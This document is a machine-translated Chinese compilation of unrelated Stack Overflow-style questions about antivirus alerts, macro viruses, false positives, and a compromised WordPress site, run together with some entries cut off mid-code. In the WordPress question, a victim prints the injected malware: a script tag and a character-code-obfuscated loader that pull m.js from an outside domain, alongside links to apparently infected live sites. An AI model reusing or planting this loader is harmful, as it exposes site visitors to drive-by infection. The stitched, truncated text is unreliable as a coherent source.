我收到了两个不同的Microsoft Word文档,我的病毒扫描程序警告我包含宏.这些应该是简单的文本文件,发送它们的人甚至不知道宏是什么; 他们可能是个错误,但他们可能是恶意感染的迹象.我的OpenOffice.org安装设置根本不加载宏,因为我很少使用它,所以我不关心我的系统的安全性.我希望能够做的是找出那些宏所做的事情,而不会让我的系统暴露于这些宏的任何恶意意图,以便告诉向我发送文件的人是否传播感染.
我刚刚注意到最近升级的Take Command被报告为感染了这种病毒,并且在过去几个小时内对NOD的更新增加了检测该病毒的能力,这就是我意识到这一点的原因.在这种情况下,根据我接受的答案中链接的文章的内容来判断,它看起来像是误报.
不过...
显然,这种病毒只在受感染的程序运行时运行,但它会尝试找到Delphi安装,找到SysConst.pas文件,并在其中添加必要的代码,以使Delphi编译带有病毒的新程序.
我没有在这台机器上安装Delphi,所以至少应该把这个问题变成一个小问题,但是在工作中我们有一些安装了Delphi的机器.幸运的是,我没有更新形式的Take Command我的工作机器,但是说其中没有很多其他程序用Delphi编写,人们最近更新了......
所以,我想我会问.有没有人看过一个活的受感染的SysConst.pas文件,并且可以提供一些不应该在那里的示例代码?这样我们就可以通过机器运行并确保我们没有问题?
它们是一样的吗?
更长的版本:
假设我在汇编时在一台Windows机器上编写了一个小应用程序,它只需添加1 + 1并将其存储在寄存器中.那么,我在Linux机器上编写完全相同的代码.会有用吗?
我想是的,因为在硬件层面,它是同一台机器,所以'硬件的语言'(原谅不精确性)将是相同的.
所以我认为一个针对Windows的病毒,但用汇编编写的内容不会只是一个Windows病毒.
我正在尝试创建一个简单的病毒清除程序.我开发的算法意味着:
我知道这是可能的,因为这与修补程序的创建方式相同,但我对如何解决这个问题感到有点迷茫.
任何帮助?
我刚遇到一个更烦人的问题。突然,Windows Defender 开始将我的一个包含 VBA 宏代码(从浏览器下载)的 excel 文件标记为病毒。正在记录的特定病毒是:
谷歌搜索显示以下信息:
太好了,所以一旦 Windows Defender 检测到它,它基本上会将文件粉碎,当您尝试打开它时,excel 声称该文件已“损坏”。我很想将我的 VBA 文件发布到http://www.virustotal.com,但它包含大量无法与更广泛社区共享的专有 VBA 代码。我想知道是否有一个网站可以用不同的条款和条件完成同样的事情?
这只是最近才开始的,并且只影响了少数用户/客户。我不确定安装了这个的客户端的分布以及他们运行的 Windows Defender 的版本。我担心这种影响会增加,直到我们的大量客户受到影响。更麻烦的是,客户通常可以毫无问题地下载一个版本,但是当他们从不同的来源下载文件(相同的 VBA 代码)时,他们遇到了问题,下载来源是否会影响文件被标记的可能性?
主要问题
是什么导致 excel VBA 文件被标记为“O97M”病毒,我该如何防止它被标记?
相关问题
我应该签署我的 VBA 宏,这会影响病毒检测的可能性吗?
它们是我可以更改的其他常见做法,会影响误报的可能性吗?
究竟什么是“Trojan:O97M/Foretype.A!ml”?窗口页面包含的信息太少,它可能不存在,赛门铁克也非常无用,(也许我在这里非常不了解)是否有用于病毒检测的集中存储库?我想人们可能不想分享它,而且我的产品因产品而异,但我会对与此相关的任何信息感兴趣......
外部图书馆
我也在使用以下外部代码:
我也在使用以下窗口函数:
Public Declare PtrSafe Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As LongPtr
Public Declare PtrSafe …我的 WordPress 网站感染了恶意代码。我该怎么做才能重新获得数据或备份?网站显示空白页面或重定向到某些恶意 URL。以下代码(和类似代码)被注入到许多页面中(还创建了许多具有不同名称的文件):
<script type='text/javascript' src='https://dock.lovegreenpencils.ga/m.js?n=nb5'></script>
<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>
我的一些受感染网站(警告:访问可能会感染):
https://lahuriyaconstruction.com/
https://getnonveg.com/
我正在使用 pyinstaller 为我的 python.py 文件生成可执行代码。但是,我收到此错误:
File "C:\Users\xxxxx\AppData\Local\Programs\Python\Python311\Lib\site-packages\PyInstaller\utils\win32\icon.py", line 143, in CopyIcons_FromIco
hdst = win32api.BeginUpdateResource(dstpath, 0)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\xxxxx\AppData\Local\Programs\Python\Python311\Lib\site-packages\win32ctypes\pywin32\win32api.py", line 208, in BeginUpdateResource
with _pywin32error():
File "C:\Users\xxxxx\AppData\Local\Programs\Python\Python311\Lib\contextlib.py", line 155, in __exit__
self.gen.throw(typ, value, traceback)
File "C:\Users\xxxxx\AppData\Local\Programs\Python\Python311\Lib\site-packages\win32ctypes\pywin32\pywintypes.py", line 37, in pywin32error
raise error(exception.winerror, exception.function, exception.strerror)
**win32ctypes.pywin32.pywintypes.error: (225, 'BeginUpdateResourceW', 'Operation did not complete successfully because the file contains a virus or potentially unwanted software.')**
我的防病毒软件声称运行 pyinstaller 时存在病毒:Trojan:Win64/Malgent!MSR
我尝试卸载python,重新安装,但没有任何结果
有一个InnoDB表,用于存储自定义构建的Web应用程序使用的博客帖子的注释.
最近我注意到注释的自动递增主键值增加了2而不是1.
我还注意到在另一个MySQL表中用于记住最后几个评论者的足迹签名(例如ip,会话ID,uagent字符串等),PHP会话的名称以"viruskinq"开头,这很奇怪,因为我认为它应该始终是十六进制的类似md5的字符串.
Google只为"viruskinq"提供了几个结果,全都是土耳其语.这很有意思,因为大约一年前,有关网站被土耳其恶棍破坏了.(我100%确定攻击者没有成功,因为我的应用程序中存在任何安全漏洞,因为当时由同一家公司托管的其他网站也被污损了.)
该站点位于共享主机上,使用Linux.
您是否认为服务器本身可能仍然受到黑客的影响?检查评论的id值显示,自今年5月以来存在这种倍增现象,但这种破坏发生在差不多一年前.
还有什么其他原因可以解释自动增量值的奇怪行为?应用程序尚未更改,在较旧的注释中,自动递增的主键值按顺序排列.
托管公司告诉我,自动增量值增加一倍的原因是因为他们使用了Master-Slave MySQL架构师,据他们说这种现象是正常的.
他们还承认,各种黑客不断攻击他们的服务器,"特别是会议",他们无法对此做任何事情.
我想我最好开始打包我的东西并转向更好的虚拟主机.
早上好,
我用Innosetup创建的exe被视为病毒!!!
真的很烦,因为我无法发送给他们帮助。有人遇到过这个问题吗?
我使用的是InnoSetup 5.5,我实际上并没有复制文件,我只需要生成一些命令即可处理证书。
提前致谢
[编辑]
Inno脚本
因此,这有点复杂,因为我需要使用psexec进行管理,删除先前的证书,然后安装新的证书。
#define MyAppName "Update Certificate"
#define MyAppVersion "1.0"
#define MyAppPublisher "kkk"
#define MyAppExeName "updateBase"
#define installConf "installConfig.exe"
#define uninstallCert "unCert.exe"
#define psexec "psexec.exe"
#define passAdmin "password"
[Setup]
AppName={#MyAppName}
AppVersion={#MyAppVersion}
AppPublisher={#MyAppPublisher}
DefaultDirName={localappdata}
DisableDirPage=yes
DisableReadyPage=yes
DisableWelcomePage=yes
PrivilegesRequired=none
CreateAppDir=no
CreateUninstallRegKey = no
OutputBaseFilename={#MyAppExeName}
Compression=lzma
SolidCompression=yes
SetupIconFile=favicon.ico
[Languages]
Name: "english"; MessagesFile: "compiler:Default.isl"
[Files]
Source: "{#installConf}"; Flags: dontcopy
Source: "{#psexec}"; Flags: dontcopy
Source: "{#uninstallCert}"; Flags: dontcopy
[Code]
var
ResultCode: Integer;
Page: TWizardPage;
CustomPageID: Integer;
InstallRadioButton: TNewRadioButton;
DeleteRadioButton: …我创建了一个C#应用程序,我在整个开发阶段一直在我的另一台计算机上进行测试.但是现在我已经完成了我添加的最近几件事的应用程序,该应用程序被检测为病毒(AVG没有显示什么样的病毒).以下是我做的一些更改:
该应用程序只是一个简单的天气应用程序 它从XML读取数据并显示它.在我做这些改变之前,我从来没有误报过.那么这里会出现什么问题,如何解决呢?
我添加了以下设置:
RegistryKey rk = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
if (startupCheck.Checked) {
rk.SetValue("WeTile", "\"" + Application.ExecutablePath.ToString() + "\"");
} else {
rk.DeleteValue("WeTile", false);
}